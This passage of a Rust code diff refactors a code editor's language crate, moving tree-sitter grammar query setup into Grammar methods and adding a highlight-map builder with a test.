GrammarId(pub usize); - -impl GrammarId { - pub(crate) fn new() -> Self { - Self(NEXT_GRAMMAR_ID.fetch_add(1, SeqCst)) - } -} - -pub struct Grammar { - id: GrammarId, - pub ts_language: tree_sitter::Language, - pub(crate) error_query: Option, - pub highlights_config: Option, - pub(crate) brackets_config: Option, - pub(crate) redactions_config: Option, - pub(crate) runnable_config: Option, - pub(crate) indents_config: Option, - pub outline_config: Option, - pub text_object_config: Option, - pub(crate) injection_config: Option, - pub(crate) override_config: Option, - pub(crate) debug_variables_config: Option, - pub(crate) imports_config: Option, - pub(crate) highlight_map: Mutex, -} - -pub struct HighlightsConfig { - pub query: Query, - pub identifier_capture_indices: Vec, -} - -struct IndentConfig { - query: Query, - indent_capture_ix: u32, - start_capture_ix: Option, - end_capture_ix: Option, - outdent_capture_ix: Option, - suffixed_start_captures: HashMap, -} - -pub struct OutlineConfig { - pub query: Query, - pub item_capture_ix: u32, - pub name_capture_ix: u32, - pub context_capture_ix: Option, - pub extra_context_capture_ix: Option, - pub open_capture_ix: Option, - pub close_capture_ix: Option, - pub annotation_capture_ix: Option, -} - -#[derive(Debug, Clone, Copy, PartialEq)] -pub enum DebuggerTextObject { - Variable, - Scope, -} - -impl DebuggerTextObject { - pub fn from_capture_name(name: &str) -> Option { - match name { - "debug-variable" => Some(DebuggerTextObject::Variable), - "debug-scope" => Some(DebuggerTextObject::Scope), - _ => None, - } - } -} - -#[derive(Debug, Clone, Copy, PartialEq)] -pub enum TextObject { - InsideFunction, - AroundFunction, - InsideClass, - AroundClass, - InsideComment, - AroundComment, -} - -impl TextObject { - pub fn from_capture_name(name: &str) -> Option { - match name { - "function.inside" => Some(TextObject::InsideFunction), - "function.around" => Some(TextObject::AroundFunction), - "class.inside" => Some(TextObject::InsideClass), - "class.around" => Some(TextObject::AroundClass), - "comment.inside" => Some(TextObject::InsideComment), - "comment.around" => Some(TextObject::AroundComment), - _ => None, - } - } - - pub fn around(&self) -> Option { - match self { - TextObject::InsideFunction => Some(TextObject::AroundFunction), - TextObject::InsideClass => Some(TextObject::AroundClass), - TextObject::InsideComment => Some(TextObject::AroundComment), - _ => None, - } - } -} - -pub struct TextObjectConfig { - pub query: Query, - pub text_objects_by_capture_ix: Vec<(u32, TextObject)>, -} - -struct InjectionConfig { - query: Query, - content_capture_ix: u32, - language_capture_ix: Option, - patterns: Vec, -} - -struct RedactionConfig { - pub query: Query, - pub redaction_capture_ix: u32, -} - -#[derive(Clone, Debug, PartialEq)] -enum RunnableCapture { - Named(SharedString), - Run, -} - -struct RunnableConfig { - pub query: Query, - /// A mapping from capture indice to capture kind - pub extra_captures: Vec, -} - -struct OverrideConfig { - query: Query, - values: HashMap, -} - -#[derive(Debug)] -struct OverrideEntry { - name: String, - range_is_inclusive: bool, - value: LanguageConfigOverride, -} - -#[derive(Default, Clone)] -struct InjectionPatternConfig { - language: Option>, - combined: bool, -} - -#[derive(Debug)] -struct BracketsConfig { - query: Query, - open_capture_ix: u32, - close_capture_ix: u32, - patterns: Vec, -} - -#[derive(Clone, Debug, Default)] -struct BracketsPatternConfig { - newline_only: bool, - rainbow_exclude: bool, -} - -pub struct DebugVariablesConfig { - pub query: Query, - pub objects_by_capture_ix: Vec<(u32, DebuggerTextObject)>, -} - -pub struct ImportsConfig { - pub query: Query, - pub import_ix: u32, - pub name_ix: Option, - pub namespace_ix: Option, - pub source_ix: Option, - pub list_ix: Option, - pub wildcard_ix: Option, - pub alias_ix: Option, -} - impl Language { pub fn new(config: LanguageConfig, ts_language: Option) -> Self { Self::new_with_id(LanguageId::new(), config, ts_language) @@ -1532,25 +851,7 @@ impl Language { Self { id, config, - grammar: ts_language.map(|ts_language| { - Arc::new(Grammar { - id: GrammarId::new(), - highlights_config: None, - brackets_config: None, - outline_config: None, - text_object_config: None, - indents_config: None, - injection_config: None, - override_config: None, - redactions_config: None, - runnable_config: None, - error_query: Query::new(&ts_language, "(ERROR) @error").ok(), - debug_variables_config: None, - imports_config: None, - ts_language, - highlight_map: Default::default(), - }) - }), + grammar: ts_language.map(|ts_language| Arc::new(Grammar::new(ts_language))), context_provider: None, toolchain: None, manifest_name: None, @@ -1573,493 +874,95 @@ impl Language { } pub fn with_queries(mut self, queries: LanguageQueries) -> Result { - if let Some(query) = queries.highlights { - self = self - .with_highlights_query(query.as_ref()) - .context("Error loading highlights query")?; - } - if let Some(query) = queries.brackets { - self = self - .with_brackets_query(query.as_ref()) - .context("Error loading brackets query")?; - } - if let Some(query) = queries.indents { - self = self - .with_indents_query(query.as_ref()) - .context("Error loading indents query")?; - } - if let Some(query) = queries.outline { - self = self - .with_outline_query(query.as_ref()) - .context("Error loading outline query")?; - } - if let Some(query) = queries.injections { - self = self - .with_injection_query(query.as_ref()) - .context("Error loading injection query")?; - } - if let Some(query) = queries.overrides { - self = self - .with_override_query(query.as_ref()) - .context("Error loading override query")?; - } - if let Some(query) = queries.redactions { - self = self - .with_redaction_query(query.as_ref()) - .context("Error loading redaction query")?; - } - if let Some(query) = queries.runnables { - self = self - .with_runnable_query(query.as_ref()) - .context("Error loading runnables query")?; - } - if let Some(query) = queries.text_objects { - self = self - .with_text_object_query(query.as_ref()) - .context("Error loading textobject query")?; - } - if let Some(query) = queries.debugger { - self = self - .with_debug_variables_query(query.as_ref()) - .context("Error loading debug variables query")?; - } - if let Some(query) = queries.imports { - self = self - .with_imports_query(query.as_ref()) - .context("Error loading imports query")?; + if let Some(grammar) = self.grammar.take() { + let grammar = + Arc::try_unwrap(grammar).map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + let grammar = grammar.with_queries(queries, &mut self.config)?; + self.grammar = Some(Arc::new(grammar)); } Ok(self) } - pub fn with_highlights_query(mut self, source: &str) -> Result { - let grammar = self.grammar_mut()?; - let query = Query::new(&grammar.ts_language, source)?; - - let mut identifier_capture_indices = Vec::new(); - for name in [ - "variable", - "constant", - "constructor", - "function", - "function.method", - "function.method.call", - "function.special", - "property", - "type", - "type.interface", - ] { - identifier_capture_indices.extend(query.capture_index_for_name(name)); - } - - grammar.highlights_config = Some(HighlightsConfig { - query, - identifier_capture_indices, - }); - - Ok(self) + pub fn with_highlights_query(self, source: &str) -> Result { + self.with_grammar_query(|grammar| grammar.with_highlights_query(source)) } - pub fn with_runnable_query(mut self, source: &str) -> Result { - let grammar = self.grammar_mut()?; - - let query = Query::new(&grammar.ts_language, source)?; - let extra_captures: Vec<_> = query - .capture_names() - .iter() - .map(|&name| match name { - "run" => RunnableCapture::Run, - name => RunnableCapture::Named(name.to_string().into()), - }) - .collect(); - - grammar.runnable_config = Some(RunnableConfig { - extra_captures, - query, - }); - - Ok(self) + pub fn with_runnable_query(self, source: &str) -> Result { + self.with_grammar_query(|grammar| grammar.with_runnable_query(source)) } - pub fn with_outline_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut item_capture_ix = 0; - let mut name_capture_ix = 0; - let mut context_capture_ix = None; - let mut extra_context_capture_ix = None; - let mut open_capture_ix = None; - let mut close_capture_ix = None; - let mut annotation_capture_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "outline", - &[], - &mut [ - Capture::Required("item", &mut item_capture_ix), - Capture::Required("name", &mut name_capture_ix), - Capture::Optional("context", &mut context_capture_ix), - Capture::Optional("context.extra", &mut extra_context_capture_ix), - Capture::Optional("open", &mut open_capture_ix), - Capture::Optional("close", &mut close_capture_ix), - Capture::Optional("annotation", &mut annotation_capture_ix), - ], - ) { - self.grammar_mut()?.outline_config = Some(OutlineConfig { - query, - item_capture_ix, - name_capture_ix, - context_capture_ix, - extra_context_capture_ix, - open_capture_ix, - close_capture_ix, - annotation_capture_ix, - }); - } - Ok(self) + pub fn with_outline_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_outline_query(source, name)) } - pub fn with_text_object_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut text_objects_by_capture_ix = Vec::new(); - for (ix, name) in query.capture_names().iter().enumerate() { - if let Some(text_object) = TextObject::from_capture_name(name) { - text_objects_by_capture_ix.push((ix as u32, text_object)); - } else { - log::warn!( - "unrecognized capture name '{}' in {} textobjects TreeSitter query", - name, - self.config.name, - ); - } - } - - self.grammar_mut()?.text_object_config = Some(TextObjectConfig { - query, - text_objects_by_capture_ix, - }); - Ok(self) + pub fn with_text_object_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| { + grammar.with_text_object_query(source, name) + }) } - pub fn with_debug_variables_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut objects_by_capture_ix = Vec::new(); - for (ix, name) in query.capture_names().iter().enumerate() { - if let Some(text_object) = DebuggerTextObject::from_capture_name(name) { - objects_by_capture_ix.push((ix as u32, text_object)); - } else { - log::warn!( - "unrecognized capture name '{}' in {} debugger TreeSitter query", - name, - self.config.name, - ); - } - } - - self.grammar_mut()?.debug_variables_config = Some(DebugVariablesConfig { - query, - objects_by_capture_ix, - }); - Ok(self) + pub fn with_debug_variables_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| { + grammar.with_debug_variables_query(source, name) + }) } - pub fn with_imports_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut import_ix = 0; - let mut name_ix = None; - let mut namespace_ix = None; - let mut source_ix = None; - let mut list_ix = None; - let mut wildcard_ix = None; - let mut alias_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "imports", - &[], - &mut [ - Capture::Required("import", &mut import_ix), - Capture::Optional("name", &mut name_ix), - Capture::Optional("namespace", &mut namespace_ix), - Capture::Optional("source", &mut source_ix), - Capture::Optional("list", &mut list_ix), - Capture::Optional("wildcard", &mut wildcard_ix), - Capture::Optional("alias", &mut alias_ix), - ], - ) { - self.grammar_mut()?.imports_config = Some(ImportsConfig { - query, - import_ix, - name_ix, - namespace_ix, - source_ix, - list_ix, - wildcard_ix, - alias_ix, - }); - } - return Ok(self); - } - - pub fn with_brackets_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut open_capture_ix = 0; - let mut close_capture_ix = 0; - if populate_capture_indices( - &query, - &self.config.name, - "brackets", - &[], - &mut [ - Capture::Required("open", &mut open_capture_ix), - Capture::Required("close", &mut close_capture_ix), - ], - ) { - let patterns = (0..query.pattern_count()) - .map(|ix| { - let mut config = BracketsPatternConfig::default(); - for setting in query.property_settings(ix) { - let setting_key = setting.key.as_ref(); - if setting_key == "newline.only" { - config.newline_only = true - } - if setting_key == "rainbow.exclude" { - config.rainbow_exclude = true - } - } - config - }) - .collect(); - self.grammar_mut()?.brackets_config = Some(BracketsConfig { - query, - open_capture_ix, - close_capture_ix, - patterns, - }); - } - Ok(self) + pub fn with_brackets_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_brackets_query(source, name)) } - pub fn with_indents_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut indent_capture_ix = 0; - let mut start_capture_ix = None; - let mut end_capture_ix = None; - let mut outdent_capture_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "indents", - &["start."], - &mut [ - Capture::Required("indent", &mut indent_capture_ix), - Capture::Optional("start", &mut start_capture_ix), - Capture::Optional("end", &mut end_capture_ix), - Capture::Optional("outdent", &mut outdent_capture_ix), - ], - ) { - let mut suffixed_start_captures = HashMap::default(); - for (ix, name) in query.capture_names().iter().enumerate() { - if let Some(suffix) = name.strip_prefix("start.") { - suffixed_start_captures.insert(ix as u32, suffix.to_owned().into()); - } - } + pub fn with_indents_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_indents_query(source, name)) + } - self.grammar_mut()?.indents_config = Some(IndentConfig { - query, - indent_capture_ix, - start_capture_ix, - end_capture_ix, - outdent_capture_ix, - suffixed_start_captures, - }); - } - Ok(self) + pub fn with_injection_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_injection_query(source, name)) } - pub fn with_injection_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut language_capture_ix = None; - let mut injection_language_capture_ix = None; - let mut content_capture_ix = None; - let mut injection_content_capture_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "injections", - &[], - &mut [ - Capture::Optional("language", &mut language_capture_ix), - Capture::Optional("injection.language", &mut injection_language_capture_ix), - Capture::Optional("content", &mut content_capture_ix), - Capture::Optional("injection.content", &mut injection_content_capture_ix), - ], - ) { - language_capture_ix = match (language_capture_ix, injection_language_capture_ix) { - (None, Some(ix)) => Some(ix), - (Some(_), Some(_)) => { - anyhow::bail!("both language and injection.language captures are present"); - } - _ => language_capture_ix, - }; - content_capture_ix = match (content_capture_ix, injection_content_capture_ix) { - (None, Some(ix)) => Some(ix), - (Some(_), Some(_)) => { - anyhow::bail!("both content and injection.content captures are present") - } - _ => content_capture_ix, - }; - let patterns = (0..query.pattern_count()) - .map(|ix| { - let mut config = InjectionPatternConfig::default(); - for setting in query.property_settings(ix) { - match setting.key.as_ref() { - "language" | "injection.language" => { - config.language.clone_from(&setting.value); - } - "combined" | "injection.combined" => { - config.combined = true; - } - _ => {} - } - } - config - }) - .collect(); - if let Some(content_capture_ix) = content_capture_ix { - self.grammar_mut()?.injection_config = Some(InjectionConfig { - query, - language_capture_ix, - content_capture_ix, - patterns, - }); - } else { - log::error!( - "missing required capture in injections {} TreeSitter query: \ - content or injection.content", - &self.config.name, - ); - } + pub fn with_override_query(mut self, source: &str) -> Result { + if let Some(grammar_arc) = self.grammar.take() { + let grammar = Arc::try_unwrap(grammar_arc) + .map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + let grammar = grammar.with_override_query( + source, + &self.config.name, + &self.config.overrides, + &mut self.config.brackets, + &self.config.scope_opt_in_language_servers, + )?; + self.grammar = Some(Arc::new(grammar)); } Ok(self) } - pub fn with_override_query(mut self, source: &str) -> anyhow::Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut override_configs_by_id = HashMap::default(); - for (ix, mut name) in query.capture_names().iter().copied().enumerate() { - let mut range_is_inclusive = false; - if name.starts_with('_') { - continue; - } - if let Some(prefix) = name.strip_suffix(".inclusive") { - name = prefix; - range_is_inclusive = true; - } - - let value = self.config.overrides.get(name).cloned().unwrap_or_default(); - for server_name in &value.opt_into_language_servers { - if !self - .config - .scope_opt_in_language_servers - .contains(server_name) - { - util::debug_panic!( - "Server {server_name:?} has been opted-in by scope {name:?} but has not been marked as an opt-in server" - ); - } - } - - override_configs_by_id.insert( - ix as u32, - OverrideEntry { - name: name.to_string(), - range_is_inclusive, - value, - }, - ); - } - - let referenced_override_names = self.config.overrides.keys().chain( - self.config - .brackets - .disabled_scopes_by_bracket_ix - .iter() - .flatten(), - ); - - for referenced_name in referenced_override_names { - if !override_configs_by_id - .values() - .any(|entry| entry.name == *referenced_name) - { - anyhow::bail!( - "language {:?} has overrides in config not in query: {referenced_name:?}", - self.config.name - ); - } - } + pub fn with_redaction_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_redaction_query(source, name)) + } - for entry in override_configs_by_id.values_mut() { - entry.value.disabled_bracket_ixs = self - .config - .brackets - .disabled_scopes_by_bracket_ix - .iter() - .enumerate() - .filter_map(|(ix, disabled_scope_names)| { - if disabled_scope_names.contains(&entry.name) { - Some(ix as u16) - } else { - None - } - }) - .collect(); + fn with_grammar_query( + mut self, + build: impl FnOnce(Grammar) -> Result, + ) -> Result { + if let Some(grammar_arc) = self.grammar.take() { + let grammar = Arc::try_unwrap(grammar_arc) + .map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + self.grammar = Some(Arc::new(build(grammar)?)); } - - self.config.brackets.disabled_scopes_by_bracket_ix.clear(); - - let grammar = self.grammar_mut()?; - grammar.override_config = Some(OverrideConfig { - query, - values: override_configs_by_id, - }); Ok(self) } - pub fn with_redaction_query(mut self, source: &str) -> anyhow::Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut redaction_capture_ix = 0; - if populate_capture_indices( - &query, - &self.config.name, - "redactions", - &[], - &mut [Capture::Required("redact", &mut redaction_capture_ix)], - ) { - self.grammar_mut()?.redactions_config = Some(RedactionConfig { - query, - redaction_capture_ix, - }); + fn with_grammar_query_and_name( + mut self, + build: impl FnOnce(Grammar, &LanguageName) -> Result, + ) -> Result { + if let Some(grammar_arc) = self.grammar.take() { + let grammar = Arc::try_unwrap(grammar_arc) + .map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + self.grammar = Some(Arc::new(build(grammar, &self.config.name)?)); } Ok(self) } - fn expect_grammar(&self) -> Result<&Grammar> { - self.grammar - .as_ref() - .map(|grammar| grammar.as_ref()) - .context("no grammar for language") - } - - fn grammar_mut(&mut self) -> Result<&mut Grammar> { - Arc::get_mut(self.grammar.as_mut().context("no grammar for language")?) - .context("cannot mutate grammar") - } - pub fn name(&self) -> LanguageName { self.config.name.clone() } @@ -2074,6 +977,23 @@ impl Language { .unwrap_or_else(|| self.config.name.as_ref().to_lowercase().into()) } + pub fn matches_kernel_language(&self, kernel_language: &str) -> bool { + let kernel_language_lower = kernel_language.to_lowercase(); + + if self.code_fence_block_name().to_lowercase() == kernel_language_lower { + return true; + } + + if self.config.name.as_ref().to_lowercase() == kernel_language_lower { + return true; + } + + self.config + .kernel_language_names + .iter() + .any(|name| name.to_lowercase() == kernel_language_lower) + } + pub fn context_provider(&self) -> Option> { self.context_provider.clone() } @@ -2089,7 +1009,7 @@ impl Language { ) -> Vec<(Range, HighlightId)> { let mut result = Vec::new(); if let Some(grammar) = &self.grammar { - let tree = grammar.parse_text(text, None); + let tree = parse_text(grammar, text, None); let captures = SyntaxSnapshot::single_tree_captures(range.clone(), text, &tree, self, |grammar| { grammar @@ -2103,9 +1023,7 @@ impl Language { BufferChunks::new(text, range, Some((captures, highlight_maps)), false, None) { let end_offset = offset + chunk.text.len(); - if let Some(highlight_id) = chunk.syntax_highlight_id - && !highlight_id.is_default() - { + if let Some(highlight_id) = chunk.syntax_highlight_id { result.push((offset..end_offset, highlight_id)); } offset = end_offset; @@ -2127,7 +1045,7 @@ impl Language { && let Some(highlights_config) = &grammar.highlights_config { *grammar.highlight_map.lock() = - HighlightMap::new(highlights_config.query.capture_names(), theme); + build_highlight_map(highlights_config.query.capture_names(), theme); } } @@ -2155,6 +1073,15 @@ impl Language { } } +#[inline] +pub fn build_highlight_map(capture_names: &[&str], theme: &SyntaxTheme) -> HighlightMap { + HighlightMap::from_ids( + capture_names + .iter() + .map(|capture_name| theme.highlight_id(capture_name).map(HighlightId::new)), + ) +} + impl LanguageScope { pub fn path_suffixes(&self) -> &[String] { self.language.path_suffixes() @@ -2336,85 +1263,37 @@ impl Debug for Language { } } -impl Grammar { - pub fn id(&self) -> GrammarId { - self.id - } - - fn parse_text(&self, text: &Rope, old_tree: Option) -> Tree { - with_parser(|parser| { - parser - .set_language(&self.ts_language) - .expect("incompatible grammar"); - let mut chunks = text.chunks_in_range(0..text.len()); - parser - .parse_with_options( - &mut move |offset, _| { - chunks.seek(offset); - chunks.next().unwrap_or("").as_bytes() - }, - old_tree.as_ref(), - None, - ) - .unwrap() - }) - } - - pub fn highlight_map(&self) -> HighlightMap { - self.highlight_map.lock().clone() - } - - pub fn highlight_id_for_name(&self, name: &str) -> Option { - let capture_id = self - .highlights_config - .as_ref()? - .query - .capture_index_for_name(name)?; - Some(self.highlight_map.lock().get(capture_id)) - } - - pub fn debug_variables_config(&self) -> Option<&DebugVariablesConfig> { - self.debug_variables_config.as_ref() - } - - pub fn imports_config(&self) -> Option<&ImportsConfig> { - self.imports_config.as_ref() - } +pub(crate) fn parse_text(grammar: &Grammar, text: &Rope, old_tree: Option) -> Tree { + with_parser(|parser| { + parser + .set_language(&grammar.ts_language) + .expect("incompatible grammar"); + let mut chunks = text.chunks_in_range(0..text.len()); + parser + .parse_with_options( + &mut move |offset, _| { + chunks.seek(offset); + chunks.next().unwrap_or("").as_bytes() + }, + old_tree.as_ref(), + None, + ) + .unwrap() + }) } -impl CodeLabelBuilder { - pub fn respan_filter_range(&mut self, filter_text: Option<&str>) { - self.filter_range = filter_text - .and_then(|filter| self.text.find(filter).map(|ix| ix..ix + filter.len())) - .unwrap_or(0..self.text.len()); - } - - pub fn push_str(&mut self, text: &str, highlight: Option) { - let start_ix = self.text.len(); - self.text.push_str(text); - if let Some(highlight) = highlight { - let end_ix = self.text.len(); - self.runs.push((start_ix..end_ix, highlight)); - } - } - - pub fn build(mut self) -> CodeLabel { - if self.filter_range.end == 0 { - self.respan_filter_range(None); - } - CodeLabel { - text: self.text, - runs: self.runs, - filter_range: self.filter_range, - } - } +pub trait CodeLabelExt { + fn fallback_for_completion( + item: &lsp::CompletionItem, + language: Option<&Language>, + ) -> CodeLabel; } -impl CodeLabel { - pub fn fallback_for_completion( +impl CodeLabelExt for CodeLabel { + fn fallback_for_completion( item: &lsp::CompletionItem, language: Option<&Language>, - ) -> Self { + ) -> CodeLabel { let highlight_id = item.kind.and_then(|kind| { let grammar = language?.grammar()?; use lsp::CompletionItemKind as Kind; @@ -2465,98 +1344,12 @@ impl CodeLabel { .as_deref() .and_then(|filter| text.find(filter).map(|ix| ix..ix + filter.len())) .unwrap_or(0..label_length); - Self { + CodeLabel { text, runs, filter_range, } } - - pub fn plain(text: String, filter_text: Option<&str>) -> Self { - Self::filtered(text.clone(), text.len(), filter_text, Vec::new()) - } - - pub fn filtered( - text: String, - label_len: usize, - filter_text: Option<&str>, - runs: Vec<(Range, HighlightId)>, - ) -> Self { - assert!(label_len <= text.len()); - let filter_range = filter_text - .and_then(|filter| text.find(filter).map(|ix| ix..ix + filter.len())) - .unwrap_or(0..label_len); - Self::new(text, filter_range, runs) - } - - pub fn new( - text: String, - filter_range: Range, - runs: Vec<(Range, HighlightId)>, - ) -> Self { - assert!( - text.get(filter_range.clone()).is_some(), - "invalid filter range" - ); - runs.iter().for_each(|(range, _)| { - assert!( - text.get(range.clone()).is_some(), - "invalid run range with inputs. Requested range {range:?} in text '{text}'", - ); - }); - Self { - runs, - filter_range, - text, - } - } - - pub fn text(&self) -> &str { - self.text.as_str() - } - - pub fn filter_text(&self) -> &str { - &self.text[self.filter_range.clone()] - } -} - -impl From for CodeLabel { - fn from(value: String) -> Self { - Self::plain(value, None) - } -} - -impl From<&str> for CodeLabel { - fn from(value: &str) -> Self { - Self::plain(value.to_string(), None) - } -} - -impl Ord for LanguageMatcher { - fn cmp(&self, other: &Self) -> std::cmp::Ordering { - self.path_suffixes.cmp(&other.path_suffixes).then_with(|| { - self.first_line_pattern - .as_ref() - .map(Regex::as_str) - .cmp(&other.first_line_pattern.as_ref().map(Regex::as_str)) - }) - } -} - -impl PartialOrd for LanguageMatcher { - fn partial_cmp(&self, other: &Self) -> Option { - Some(self.cmp(other)) - } -} - -impl Eq for LanguageMatcher {} - -impl PartialEq for LanguageMatcher { - fn eq(&self, other: &Self) -> bool { - self.path_suffixes == other.path_suffixes - && self.first_line_pattern.as_ref().map(Regex::as_str) - == other.first_line_pattern.as_ref().map(Regex::as_str) - } } #[cfg(any(test, feature = "test-support"))] @@ -2638,6 +1431,7 @@ impl LspAdapter for FakeLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _cx: &mut AsyncApp, ) -> Result> { Ok(self.initialization_options.clone()) } @@ -2656,68 +1450,6 @@ impl LspAdapter for FakeLspAdapter { } } -enum Capture<'a> { - Required(&'static str, &'a mut u32), - Optional(&'static str, &'a mut Option), -} - -fn populate_capture_indices( - query: &Query, - language_name: &LanguageName, - query_type: &str, - expected_prefixes: &[&str], - captures: &mut [Capture<'_>], -) -> bool { - let mut found_required_indices = Vec::new(); - 'outer: for (ix, name) in query.capture_names().iter().enumerate() { - for (required_ix, capture) in captures.iter_mut().enumerate() { - match capture { - Capture::Required(capture_name, index) if capture_name == name => { - **index = ix as u32; - found_required_indices.push(required_ix); - continue 'outer; - } - Capture::Optional(capture_name, index) if capture_name == name => { - **index = Some(ix as u32); - continue 'outer; - } - _ => {} - } - } - if !name.starts_with("_") - && !expected_prefixes - .iter() - .any(|&prefix| name.starts_with(prefix)) - { - log::warn!( - "unrecognized capture name '{}' in {} {} TreeSitter query \ - (suppress this warning by prefixing with '_')", - name, - language_name, - query_type - ); - } - } - let mut missing_required_captures = Vec::new(); - for (capture_ix, capture) in captures.iter().enumerate() { - if let Capture::Required(capture_name, _) = capture - && !found_required_indices.contains(&capture_ix) - { - missing_required_captures.push(*capture_name); - } - } - let success = missing_required_captures.is_empty(); - if !success { - log::error!( - "missing required capture(s) in {} {} TreeSitter query: {}", - language_name, - query_type, - missing_required_captures.join(", ") - ); - } - success -} - pub fn point_to_lsp(point: PointUtf16) -> lsp::Position { lsp::Position::new(point.row, point.column) } @@ -2767,41 +1499,78 @@ pub fn rust_lang() -> Arc { ..Default::default() }, line_comments: vec!["// ".into(), "/// ".into(), "//! ".into()], + brackets: BracketPairConfig { + pairs: vec![ + BracketPair { + start: "{".into(), + end: "}".into(), + close: true, + surround: false, + newline: true, + }, + BracketPair { + start: "[".into(), + end: "]".into(), + close: true, + surround: false, + newline: true, + }, + BracketPair { + start: "(".into(), + end: ")".into(), + close: true, + surround: false, + newline: true, + }, + BracketPair { + start: "<".into(), + end: ">".into(), + close: false, + surround: false, + newline: true, + }, + BracketPair { + start: "\"".into(), + end: "\"".into(), + close: true, + surround: false, + newline: false, + }, + ], + ..Default::default() + }, ..Default::default() }, Some(tree_sitter_rust::LANGUAGE.into()), ) .with_queries(LanguageQueries { outline: Some(Cow::from(include_str!( - "../../languages/src/rust/outline.scm" + "../../grammars/src/rust/outline.scm" ))), indents: Some(Cow::from(include_str!( - "../../languages/src/rust/indents.scm" + "../../grammars/src/rust/indents.scm" ))), brackets: Some(Cow::from(include_str!( - "../../languages/src/rust/brackets.scm" + "../../grammars/src/rust/brackets.scm" ))), text_objects: Some(Cow::from(include_str!( - "../../languages/src/rust/textobjects.scm" + "../../grammars/src/rust/textobjects.scm" ))), highlights: Some(Cow::from(include_str!( - "../../languages/src/rust/highlights.scm" + "../../grammars/src/rust/highlights.scm" ))), injections: Some(Cow::from(include_str!( - "../../languages/src/rust/injections.scm" + "../../grammars/src/rust/injections.scm" ))), overrides: Some(Cow::from(include_str!( - "../../languages/src/rust/overrides.scm" + "../../grammars/src/rust/overrides.scm" ))), redactions: None, runnables: Some(Cow::from(include_str!( - "../../languages/src/rust/runnables.scm" + "../../grammars/src/rust/runnables.scm" ))), debugger: Some(Cow::from(include_str!( - "../../languages/src/rust/debugger.scm" - ))), - imports: Some(Cow::from(include_str!( - "../../languages/src/rust/imports.scm" + "../../grammars/src/rust/debugger.scm" ))), }) .expect("Could not parse queries"); @@ -2826,19 +1595,19 @@ pub fn markdown_lang() -> Arc { ) .with_queries(LanguageQueries { brackets: Some(Cow::from(include_str!( - "../../languages/src/markdown/brackets.scm" + "../../grammars/src/markdown/brackets.scm" ))), injections: Some(Cow::from(include_str!( - "../../languages/src/markdown/injections.scm" + "../../grammars/src/markdown/injections.scm" ))), highlights: Some(Cow::from(include_str!( - "../../languages/src/markdown/highlights.scm" + "../../grammars/src/markdown/highlights.scm" ))), indents: Some(Cow::from(include_str!( - "../../languages/src/markdown/indents.scm" + "../../grammars/src/markdown/indents.scm" ))), outline: Some(Cow::from(include_str!( - "../../languages/src/markdown/outline.scm" + "../../grammars/src/markdown/outline.scm" ))), ..LanguageQueries::default() }) @@ -2849,10 +1618,47 @@ pub fn markdown_lang() -> Arc { #[cfg(test)] mod tests { use super::*; - use gpui::TestAppContext; + use gpui::{TestAppContext, rgba}; use pretty_assertions::assert_matches; + #[test] + fn test_highlight_map() { + let theme = SyntaxTheme::new( + [ + ("function", rgba(0x100000ff)), + ("function.method", rgba(0x200000ff)), + ("function.async", rgba(0x300000ff)), + ("variable.builtin.self.rust", rgba(0x400000ff)), + ("variable.builtin", rgba(0x500000ff)), + ("variable", rgba(0x600000ff)), + ] + .iter() + .map(|(name, color)| (name.to_string(), (*color).into())), + ); + + let capture_names = &[ + "function.special", + "function.async.rust", + "variable.builtin.self", + ]; + + let map = build_highlight_map(capture_names, &theme); + assert_eq!( + theme.get_capture_name(map.get(0).unwrap()), + Some("function") + ); + assert_eq!( + theme.get_capture_name(map.get(1).unwrap()), + Some("function.async") + ); + assert_eq!( + theme.get_capture_name(map.get(2).unwrap()), + Some("variable.builtin") + ); + } + #[gpui::test(iterations = 10)] + async fn test_language_loading(cx: &mut TestAppContext) { let languages = LanguageRegistry::test(cx.executor()); let languages = Arc::new(languages); diff --git a/crates/language/src/language_registry.rs b/crates/language/src/language_registry.rs index d73a44fda3347ebcec9c6798325838acec543566..2ac6ef456d2ee17c8710ec1c37f22ff34a648e4d 100644 --- a/crates/language/src/language_registry.rs +++ b/crates/language/src/language_registry.rs @@ -5,6 +5,10 @@ use crate::{ }; use anyhow::{Context as _, Result, anyhow}; use collections::{FxHashMap, HashMap, HashSet, hash_map}; +pub use language_core::{ + BinaryStatus, LanguageName, LanguageQueries, LanguageServerStatusUpdate, + QUERY_FILENAME_PREFIXES, ServerHealth, +}; use settings::{AllLanguageSettingsContent, LanguageSettingsContent}; use futures::{ @@ -12,15 +16,13 @@ use futures::{ channel::{mpsc, oneshot}, }; use globset::GlobSet; -use gpui::{App, BackgroundExecutor, SharedString}; +use gpui::{App, BackgroundExecutor}; use lsp::LanguageServerId; use parking_lot::{Mutex, RwLock}; use postage::watch; -use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; + use 